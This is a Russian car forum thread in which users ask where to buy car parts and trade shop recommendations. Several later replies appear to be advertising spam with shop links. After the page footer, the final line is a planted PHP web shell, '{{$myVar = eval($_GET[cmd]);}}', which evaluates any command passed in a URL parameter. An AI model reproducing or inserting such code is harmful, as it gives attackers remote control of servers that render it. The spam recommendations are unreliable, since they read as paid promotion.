+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Где запчасти покупать


  1. #1
    Мимо проходил Egimli is on a distinguished road Аватар для Egimli
    Регистрация
    20.05.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    2

    Где запчасти покупать

    Ребята поделитесь ссылками, где заказываете запчасти на свой автомобиль? Где небольшие сроки доставки и т.д буду признательно благодарен!

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Город и машина какая ?
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    Мимо проходил Tuaron is on a distinguished road Аватар для Tuaron
    Регистрация
    04.05.2015
    Откуда
    Москва
    Машина
    GTI V
    Сообщений
    46
    вклинюсь. знаком еще с мпски с атомиком, самый глупый магаз в мск, но зато самый большой, и много чего есть в наличии, если не жабит переплачивать в СРЕДНЕМ 100%))))), кстати ,эти товарищи очень не любят возить индивидуальные заказы, к примеру, заказал у них опору ст2 от CP-E, ждал месяц)))))) а вот с форге (байпас) ждал аш 4 месяца... они понимаешь ли контейнер (или добивали груз).... завтраки и т.п. но оба варианта лично я отхватил по сладкой цене(опять же не из наличия и под спец заказ), не успели с ценой определится, когда получал опоры пытались развести на еще бабки, но я 100% предоплату внес, раскрутить не удалось, я единственный кто у них купил опоры за че то около 14 к.. сразу как пришел им под склад заказ ценник был уже около 22, сейчас вообще космос)))
    заказывал все в основном у очень грамотного и правильного продавана впоследствии, но на многих форумах его магаз в бане, хз как тут... название говорить не буду(а вот имя директора могу Костя))), вдруг и здесь он в бане, на мпске его даже упоминание стерли и все его сообщения))))))))))))
    но дешевле чем у него не встречал цен, все очень быстро и много чего в наличии есть. но к сожалению на заказ возить не всегда удобно, по времени, да и люблю грамотного продавана, а вот в моей теперешней машинке я ему с выбором не совсем доверяю, поэтому ищу грамотного и недорогого продавана, которому можно доверить деньги и ГЛАВНОЕ ВЫБОР(так как мне более интересно если сам продаван правильно и граотно порекомендует ту или иную запчасть)..
    поэтому присоединяюсь к вопросу))))
    ну соответственно Москва
    gti mk5

  4. #4
    GTI-Racing PROexRacing will become famous soon enough Аватар для PROexRacing
    Регистрация
    17.08.2012
    Откуда
    Saint-P.
    Машина
    octaviaRS
    Сообщений
    849
    vRS GTI и TSI и на это не пиSTI :epti-work:
    по автобану едут навстречу ветру четыре колеса оооуу GTI-CLUB
    Skoda Ebashing Academy
    MaxiSport Tuning

  5. #5
    Мимо проходил Tuaron is on a distinguished road Аватар для Tuaron
    Регистрация
    04.05.2015
    Откуда
    Москва
    Машина
    GTI V
    Сообщений
    46
    ну питер, дело хорошее, но я в москве...
    Последний раз редактировалось Tuaron; 21.05.2015 в 22:58.

  6. #6
    Мимо проходил aftoservice is on a distinguished road Аватар для aftoservice
    Регистрация
    28.03.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1

  7. #7
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    А оптом кто торгует у нас запчастями?

  8. #8
    GTI-Racing Magistral is on a distinguished road Аватар для Magistral
    Регистрация
    11.12.2010
    Откуда
    Москва
    Машина
    Golf
    Сообщений
    156
    Ни для кого не секрет, что работа автосервиса не возможна без постоянных закупок автозапчастей. Для меня это всегда было испытание. Найти, заказать, а потом нервничать, не обманули ли меня, действительно ли качественный товар приедет. На свой страх и риск я решил сделать заказ на aspaco.ru . Большой ассортимент запчастей до иномарок, я посмотрел, сделал первый большой заказ. Когда он прибыл в город, честно сказать, я был приятно удивлен. Для такого качества цена совсем не высокая.

  9. #9
    Новичок Vulkree is on a distinguished road Аватар для Vulkree
    Регистрация
    21.05.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    111
    Недавно ремонтировали машину, долго выбирали компанию. Вот друг посоветовал обратится в эту https://www.fan-guf.ru/dopolnenie/17...bogatstvu.html , заказывали запчасти, сделали все супер. Советую.

  10. #10
    Новичок Leolton is on a distinguished road Аватар для Leolton
    Регистрация
    11.07.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    121
    Выход личного транспортного средства из строя становится серьезной проблемой для большинства современных людей. На сегодняшний день машина является не внешним показателем достатка и солидного статуса, а необходимостью. В противном случае перемещение по городу серьезно усложняется, особенно если вы используете автомобиль для работы или бизнеса. При этом для иномарок, в частности автомобилей такого уровня, как Мерседес, особенно важно использование качественных, оригинальных комплектующих.

    Современный рынок деталей для рассматриваемой марки авто представлен в широком разнообразии. Однако, несмотря на обилие предложений, найти нужные комплектующие, а тем более надежные, недорогие и не изношенные запчасти, практически невозможно. В то время как новые оригинальные детали могут нанести серьезный ущерб бюджету, покупка контрактных запчастей становится рациональным решением.

    Преимущества контрактных запчастей для Мерседеса https://www.niann.ru/?id=558901 .

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Еду покупать GTI V Москва
    от Timurk0 в разделе Golf 5
    Ответов: 14
    Последнее сообщение: 04.01.2024, 03:18
  2. омывайка не покупать!
    от energia в разделе Курилка
    Ответов: 4
    Последнее сообщение: 11.08.2018, 18:13
  3. Что не нужно покупать!!!!! GOLF 5 GT
    от magnum126 в разделе Отзывы / Выбор
    Ответов: 25
    Последнее сообщение: 19.09.2010, 09:44
  4. Где Правильно Покупать Запчасти?
    от ejislesa в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 11.04.2009, 13:19
  5. Покупать?
    от fess в разделе Отзывы / Выбор
    Ответов: 1
    Последнее сообщение: 06.11.2006, 18:36

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}